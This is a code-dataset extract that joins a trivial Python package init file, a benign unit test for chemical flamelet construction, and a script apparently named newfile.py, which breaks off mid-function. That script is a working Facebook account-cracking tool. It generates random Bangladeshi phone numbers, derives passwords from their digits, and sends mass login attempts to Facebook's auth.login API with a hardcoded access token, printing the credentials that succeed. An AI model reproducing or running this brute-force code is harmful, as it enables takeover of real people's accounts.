rubin_sim/scheduler/basis_functions/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/scheduler/basis_functions/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
from .basis_functions import *
from .mask_basis_funcs import *
from .feasibility_funcs import *
from .rolling_funcs import *
| 25
| 32
| 0.808
| 17
| 125
| 5.647059
| 0.470588
| 0.3125
| 0.3125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128
| 125
| 4
| 33
| 31.25
| 0.880734
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9dccf7be389b738013850ada4d2622047dc63864
| 9,441
|
py
|
Python
|
tests/flamelet/test_flamelet_construction_coverage.py
|
sandialabs/Spitfire
|
65670e3ba5d1ccb4ac72524b77957706345c5bf6
|
[
"Apache-2.0"
] | 11
|
2020-03-20T02:10:17.000Z
|
2021-12-14T10:08:09.000Z
|
tests/flamelet/test_flamelet_construction_coverage.py
|
sandialabs/Spitfire
|
65670e3ba5d1ccb4ac72524b77957706345c5bf6
|
[
"Apache-2.0"
] | 18
|
2020-03-18T18:58:56.000Z
|
2021-12-21T02:35:35.000Z
|
tests/flamelet/test_flamelet_construction_coverage.py
|
sandialabs/Spitfire
|
65670e3ba5d1ccb4ac72524b77957706345c5bf6
|
[
"Apache-2.0"
] | 2
|
2021-05-31T17:24:56.000Z
|
2021-06-20T05:27:41.000Z
|
import unittest
import numpy as np
import pickle
from os.path import join, abspath
from spitfire import ChemicalMechanismSpec, Flamelet, FlameletSpec
def construct_adiabatic_flamelet(initialization, grid_type, diss_rate_form):
    """Try to build an adiabatic Flamelet through every supported construction path.

    Parameters
    ----------
    initialization : str or np.ndarray
        initial condition spec ('equilibrium', 'linear-TY', 'unreacted', or an interior state)
    grid_type : str
        one of 'uniform', 'clustered-1args', 'clustered-2args', 'clustered-3args', 'custom'
    diss_rate_form : str
        one of 'Peters', 'uniform', 'custom'

    Returns
    -------
    bool
        True when every construction path (kwargs, dict, FlameletSpec, pickle
        round-trips, library slice) succeeds, False otherwise.
    """
    test_xml = abspath(join('tests', 'test_mechanisms', 'h2-burke.xml'))
    mechanism = ChemicalMechanismSpec(cantera_xml=test_xml, group_name='h2-burke')
    air = mechanism.stream(stp_air=True)
    fuel = mechanism.stream('X', 'H2:1')
    fuel.TP = 300, air.P
    # Table lookup replaces the original duplicated if/elif chain;
    # 'uniform' and 'clustered-1args' intentionally share the same specs.
    grid_specs = {
        'uniform': {'grid_points': 8},
        'clustered-1args': {'grid_points': 8},
        'clustered-2args': {'grid_points': 8, 'grid_cluster_intensity': 4.},
        'clustered-3args': {'grid_points': 8, 'grid_cluster_intensity': 4., 'grid_cluster_point': 0.4},
        'custom': {'grid': np.linspace(0., 1., 8)},
    }[grid_type]
    if diss_rate_form == 'custom':
        drf_specs = {'dissipation_rate': np.linspace(0., 1., 8)}
    else:
        # 'Peters' and 'uniform' used identical specs in the original branches.
        drf_specs = {'max_dissipation_rate': 1., 'dissipation_rate_form': diss_rate_form}
    flamelet_specs = {'mech_spec': mechanism,
                      'oxy_stream': air,
                      'fuel_stream': fuel,
                      'initial_condition': initialization}
    flamelet_specs.update(grid_specs)
    flamelet_specs.update(drf_specs)
    try:
        # Exercise every supported construction path plus pickle round-trips.
        Flamelet(**flamelet_specs)
        Flamelet(flamelet_specs=flamelet_specs)
        fso = FlameletSpec(**flamelet_specs)
        f = Flamelet(fso)
        f = Flamelet(pickle.loads(pickle.dumps(fso)))
        lib = f.make_library_from_interior_state(f.initial_interior_state)
        Flamelet(library_slice=lib)
        Flamelet(library_slice=pickle.loads(pickle.dumps(lib)))
        return True
    except Exception:  # was a bare 'except:', which also swallowed KeyboardInterrupt/SystemExit
        return False
def construct_nonadiabatic_flamelet(initialization, grid_type, diss_rate_form):
    """Try to build nonadiabatic Flamelets for four heat-loss configurations.

    Parameters
    ----------
    initialization : str or np.ndarray
        initial condition spec ('equilibrium', 'linear-TY', 'unreacted', or an interior state)
    grid_type : str
        one of 'uniform', 'clustered-1args', 'clustered-2args', 'clustered-3args', 'custom'
    diss_rate_form : str
        one of 'Peters', 'uniform', 'custom'

    Returns
    -------
    bool
        True when every construction path succeeds for all four heat-loss
        variants, False otherwise.
    """
    test_xml = abspath(join('tests', 'test_mechanisms', 'h2-burke.xml'))
    mechanism = ChemicalMechanismSpec(cantera_xml=test_xml, group_name='h2-burke')
    air = mechanism.stream(stp_air=True)
    fuel = mechanism.stream('X', 'H2:1')
    fuel.TP = 300, air.P
    # Table lookup replaces the original duplicated if/elif chain;
    # 'uniform' and 'clustered-1args' intentionally share the same specs.
    grid_specs = {
        'uniform': {'grid_points': 8},
        'clustered-1args': {'grid_points': 8},
        'clustered-2args': {'grid_points': 8, 'grid_cluster_intensity': 4.},
        'clustered-3args': {'grid_points': 8, 'grid_cluster_intensity': 4., 'grid_cluster_point': 0.4},
        'custom': {'grid': np.linspace(0., 1., 8)},
    }[grid_type]
    if diss_rate_form == 'custom':
        drf_specs = {'dissipation_rate': np.linspace(0., 1., 8)}
    else:
        # 'Peters' and 'uniform' used identical specs in the original branches.
        drf_specs = {'max_dissipation_rate': 1., 'dissipation_rate_form': diss_rate_form}

    base_specs = {'mech_spec': mechanism,
                  'oxy_stream': air,
                  'fuel_stream': fuel,
                  'initial_condition': initialization,
                  'heat_transfer': 'nonadiabatic'}
    # The four heat-loss configurations the original exercised verbatim.
    variants = ({'convection_temperature': 350.,
                 'convection_coefficient': 0.,
                 'radiation_temperature': 350.,
                 'radiative_emissivity': 0.},
                {'scale_heat_loss_by_temp_range': True,
                 'scale_convection_by_dissipation': True,
                 'use_linear_ref_temp_profile': True,
                 'convection_coefficient': 1.e7,
                 'radiative_emissivity': 0.},
                {'scale_heat_loss_by_temp_range': False,
                 'scale_convection_by_dissipation': False,
                 'use_linear_ref_temp_profile': True,
                 'convection_coefficient': 1.e7,
                 'radiative_emissivity': 0.},
                {'scale_heat_loss_by_temp_range': False,
                 'scale_convection_by_dissipation': True,
                 'use_linear_ref_temp_profile': True,
                 'convection_coefficient': 1.e7,
                 'radiative_emissivity': 0.})

    def _exercise(specs):
        # Build the flamelet through every supported path, incl. pickle round-trips.
        Flamelet(**specs)
        Flamelet(flamelet_specs=specs)
        fso = FlameletSpec(**specs)
        f = Flamelet(fso)
        f = Flamelet(pickle.loads(pickle.dumps(fso)))
        lib = f.make_library_from_interior_state(f.initial_interior_state)
        Flamelet(library_slice=lib)
        Flamelet(library_slice=pickle.loads(pickle.dumps(lib)))

    try:
        for extra in variants:
            specs = dict(base_specs)
            specs.update(extra)
            specs.update(grid_specs)
            specs.update(drf_specs)
            _exercise(specs)
        return True
    except Exception:  # was a bare 'except:', which also swallowed KeyboardInterrupt/SystemExit
        return False
def create_test(ht, ic, gt, drf):
    """Build a unittest test method for one (heat transfer, initialization, grid, dissipation) combo.

    Parameters
    ----------
    ht : str
        heat transfer mode, 'adiabatic' or 'nonadiabatic'
    ic, gt, drf
        initialization, grid type, and dissipation-rate form forwarded to the
        construct_*_flamelet helpers

    Returns
    -------
    callable
        a bound-method-style function suitable for setattr() on a TestCase.

    Raises
    ------
    ValueError
        if ht is not a recognized heat transfer mode (the original code would
        have raised a confusing NameError on the unbound 'test' variable).
    """
    if ht == 'adiabatic':
        def test(self):
            self.assertTrue(construct_adiabatic_flamelet(ic, gt, drf))
    elif ht == 'nonadiabatic':
        def test(self):
            self.assertTrue(construct_nonadiabatic_flamelet(ic, gt, drf))
    else:
        raise ValueError('unknown heat transfer mode: ' + repr(ht))
    return test
class Construction(unittest.TestCase):
    """Empty TestCase shell; test methods are attached dynamically at import time."""
# Module-level test generation: build one throwaway Flamelet to discover the
# supported heat-transfer modes and a valid interior state, then attach one
# test method to Construction per parameter combination.
test_xml = abspath(join('tests', 'test_mechanisms', 'h2-burke.xml'))
mechanism = ChemicalMechanismSpec(cantera_xml=test_xml, group_name='h2-burke')
air = mechanism.stream(stp_air=True)
fuel = mechanism.stream('X', 'H2:1')
fuel.TP = 300, air.P
flamelet_specs = {'mech_spec': mechanism,
                  'oxy_stream': air,
                  'fuel_stream': fuel,
                  'grid_points': 8,
                  'grid_cluster_intensity': 4.,
                  'initial_condition': 'equilibrium',
                  'max_dissipation_rate': 0.}
temp_flamelet = Flamelet(**flamelet_specs)
# NOTE(review): iterates a private attribute (_heat_transfers) — presumably
# ('adiabatic', 'nonadiabatic'); confirm against the Flamelet implementation.
for ht in temp_flamelet._heat_transfers:
    for ic in ['equilibrium', 'linear-TY', 'unreacted', temp_flamelet.initial_interior_state]:
        for gt in ['uniform', 'clustered-1args', 'clustered-2args', 'clustered-3args', 'custom']:
            for drf in ['uniform', 'Peters', 'custom']:
                # The ndarray initial condition cannot appear in a test name; label it 'icstate'.
                ic_str = 'icstate' if isinstance(ic, np.ndarray) else ic
                testname = 'test_construct_flamelet_' + ht + '_' + ic_str + '_' + gt + '_' + drf
                setattr(Construction, testname, create_test(ht, ic, gt, drf))
if __name__ == '__main__':
    unittest.main()
| 38.378049
| 97
| 0.601313
| 1,032
| 9,441
| 5.184109
| 0.126938
| 0.089907
| 0.026916
| 0.054206
| 0.854953
| 0.854953
| 0.842243
| 0.828411
| 0.828411
| 0.828411
| 0
| 0.015213
| 0.2898
| 9,441
| 245
| 98
| 38.534694
| 0.782699
| 0
| 0
| 0.826733
| 0
| 0
| 0.18981
| 0.064612
| 0
| 0
| 0
| 0
| 0.009901
| 1
| 0.024752
| false
| 0.004951
| 0.024752
| 0
| 0.079208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9dd1675dcca8b7c45a39bdad38fc6485f172184a
| 27,433
|
py
|
Python
|
newfile.py
|
HANTER2/z
|
1cc18ba7cd86ebf5b6795b08022c29eb3bba8f61
|
[
"Apache-2.0"
] | null | null | null |
newfile.py
|
HANTER2/z
|
1cc18ba7cd86ebf5b6795b08022c29eb3bba8f61
|
[
"Apache-2.0"
] | null | null | null |
newfile.py
|
HANTER2/z
|
1cc18ba7cd86ebf5b6795b08022c29eb3bba8f61
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import sys
import random
import requests
from threading import Thread as pool
#text colour()
white = '\33[90m'
red = '\33[91m'
green = '\33[92m'
yollow = '\33[93m'
blue = '\33[94m'
rosy = '\33[95m'
pest = '\33[96m'
blue = '\x1b[94m'
lightblue = '\x1b[94m'
red = '\x1b[91m'
white = '\x1b[97m'
green = '\x1b[93m'
green = '\x1b[1;32m'
cyan = '\x1b[96m'
end = '\x1b[0m'
yellow = '\n\n\x1b[1;93m'
#colour end
file2=("file",'a')
try:
import requests
import mechanize
except:
os.system("pip install requests")
os.system("pip install mechanize")
os.system("pip2 install requests")
os.system("pip2 install mechanize")
logo11=(yellow+"""
███╗░░░███╗██████╗░
████╗░████║██╔══██╗
██╔████╔██║██║░░██║
██║╚██╔╝██║██║░░██║
██║░╚═╝░██║██████╔╝
╚═╝░░░░░╚═╝╚═════╝░
░█████╗░██╗░░░░░░█████╗░███╗░░░███╗██╗███╗░░██╗
██╔══██╗██║░░░░░██╔══██╗████╗░████║██║████╗░██║
███████║██║░░░░░███████║██╔████╔██║██║██╔██╗██║
██╔══██║██║░░░░░██╔══██║██║╚██╔╝██║██║██║╚████║
██║░░██║███████╗██║░░██║██║░╚═╝░██║██║██║░╚███║
╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═╝╚═╝░░╚══╝
\x1b[94m
╔═══╦╗─╔╦═══╦╗╔╗╔╦═══╦╗─╔╦╗─╔╦═══╦╗──╔╗
║╔═╗║║─║║╔═╗║║║║║╠╗╔╗║║─║║║─║║╔═╗║╚╗╔╝║
║║─╚╣╚═╝║║─║║║║║║║║║║║╚═╝║║─║║╚═╝╠╗╚╝╔╝
║║─╔╣╔═╗║║─║║╚╝╚╝║║║║║╔═╗║║─║║╔╗╔╝╚╗╔╝
║╚═╝║║─║║╚═╝╠╗╔╗╔╬╝╚╝║║─║║╚═╝║║║╚╗─║║
╚═══╩╝─╚╩═══╝╚╝╚╝╚═══╩╝─╚╩═══╩╝╚═╝─╚╝""")
alamin=(green+"\n---------------------- Delovement by MD ALAMIN CHOWDOWRY --------")
def b (z):
for word in z + '\n':
sys.stdout.write(word)
sys.stdout.flush()
time.sleep(0.3)
os.system('clear')
print(logo11)
print(red+"#######################################################")
print(green+"# GITHHP:https://github.com/HANTER2 #")
print("# FB:Mdalamin54321 #")
print("# Whatapp&&Imo :+8801705677081 #")
print("# Tnx For GITHUP:cracker911181 #")
print("# Youtube:MAFIYA CYBER KING #")
print(red+"#######################################################")
print(green+"\n[1] GP ")
print(green+"\n[2] Robi")
print(green+"\n[3] Bangalink")
print(cyan+"\n[4] Contact me")
print(red+"\n\n*****************************************************")
a=input(green+"\n\nEnter Your BD Oparator : ")
b(cyan+" []Loding\x1b[1;32m ....")
sys.stdout.flush()
time.sleep(9)
os.system('clear')
if a=="1":
print(green+"""
_____ _____
/ ____| | __ \
| | __ | |__) |
| | |_ | | ___/
| |__| | | |
\_____| |_|""")
print(green+"\n171,172,173,174,176,175,177,179,170,178")
if a=="2":
print("""
_______ __ __
| \ | \ | \
| $$$$$$$\ ______ | $$____ \$$
| $$__| $$ / \ | $$ \ | \
| $$ $$| $$$$$$\| $$$$$$$\| $$
| $$$$$$$\| $$ | $$| $$ | $$| $$
| $$ | $$| $$__/ $$| $$__/ $$| $$
| $$ | $$ \$$ $$| $$ $$| $$
\$$ \$$ \$$$$$$ \$$$$$$$ \$$
""")
print(alamin)
print(red+"\n 181,182,183,184,185,186,187,188,189,180")
if a=="3":
print(green+"""
____
| _ \
| |_) | __ _ _ __ __ _ __ _
| _ < / _` | '_ \ / _` |/ _` |
| |_) | (_| | | | | (_| | (_| |
|____/ \__,_|_| |_|\__, |\__,_|
__/ |
|___/
\33[94m
.-. .-..-. .-..-. .-.
| | | || `| || |/ /
| `--.| || |\ || |\ \
`----'`-'`-' `-'`-' `-'
""")
print(green+"\n---------------------- Delovement by MD ALAMIN CHOWDOWRY --------")
print(green+"\n191,192,193,194,195,196,197,198,199,190")
if a=="4":
os.system("xdg-open https://www.facebook.com/Mdalamin54321")
manu()
code=str(input("\nEnter Your Code: "))
print(green+"\nTo Exit: Pess (Ctrl +c)\n")
print(cyan+"\n♦♠♥♣♠♦♥♠♥♠♥♪♥♠♦♠♥♠♦♠♥♣♠♪♥♦")
##############################
def hi1():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
a=("\n+"+user1," | ",pas1)
def hi2():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi3():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi4():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi5():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi6():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi7():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi8():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi9():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi10():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi11():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi12():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi13():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi14():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi15():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi16():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi17():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi18():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi19():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi20():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi21():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi22():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi23():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi24():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi25():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi26():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi27():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
